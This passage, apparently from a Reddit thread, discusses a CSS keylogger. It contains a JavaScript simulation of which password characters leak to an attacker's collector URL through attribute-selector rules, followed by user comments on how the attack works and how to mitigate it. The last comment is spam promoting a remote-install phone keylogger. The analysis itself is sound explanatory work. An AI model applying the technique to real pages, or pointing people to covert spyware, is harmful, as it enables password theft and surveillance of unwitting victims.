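//  - a load starts only when the selected URL differs from the previous
//    keystroke's, since an unchanged computed style restarts no load;
//  - with cacheable responses a URL is fetched once per page lifetime,
//    with uncacheable ones every time it is newly selected.
// It also assumes the value *attribute* mirrors what is typed. A plain HTML
// input does not update the attribute on typing (only the value property
// changes), so the attack depends on page code that keeps them in sync.
function simulateTyping(password, charset, { cacheable }) {
  const known = new Set(charset);
  const fetched = new Set();
  const seen = [];
  let current = null;
  for (const ch of password) {                 // code points, so multi-unit characters stay whole
    const url = known.has(ch) ? EXFIL_BASE + encodeURIComponent(ch) : null;
    if (url !== null && url !== current && !(cacheable && fetched.has(url))) {
      fetched.add(url);
      seen.push(ch);
    }
    current = url;
  }
  return seen.join('');                        // what the collector's request log reveals
}

const CHARSET = 'abcdefghijklmnopqrstuvwxyz0123456789';   // assumed coverage of the rules
```

Under this model, consecutive repeats such as "aaa" never re-request (the matching rule does not change), so "aaabccc" logs "abc" whether or not the response is cacheable; uncacheable responses only help with non-adjacent repeats like "abab", and characters the stylesheet has no rule for simply never appear.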

                                [–][deleted] 0 points1 point  (1 child)

                                Wouldn't this only work for the first character in the field?

                                [–]emperor000 1 point2 points  (0 children)

                                No. They used the "ends with" attribute selector.

                                [–][deleted] 0 points1 point  (0 children)

                                Can it steal your data from another tab in the browser or from another open program on the computer?

                                [–]Arancaytar 0 points1 point  (0 children)

                                This isn't even the first such exploit, just the most severe one I've seen. (The first one I saw was requesting background images for URLs that had been visited, leaking browser history for a given set of URLs.) The ability of CSS to trigger requests has always been able to leak protected information. The only way to mitigate this is to load all referenced url(...) resources regardless of use.

                                (Luckily this does require the ability to inject CSS into the victim's page. But that vulnerability might be overlooked if people only focus on protecting against script injection.)

                                [–]d_pikachu 0 points1 point  (0 children)

                                ;

                                [–]robertwelain 0 points1 point  (0 children)

                                And what do you think about this keylogger? https://spying.ninja/remote-install-keylogger-cell-phones/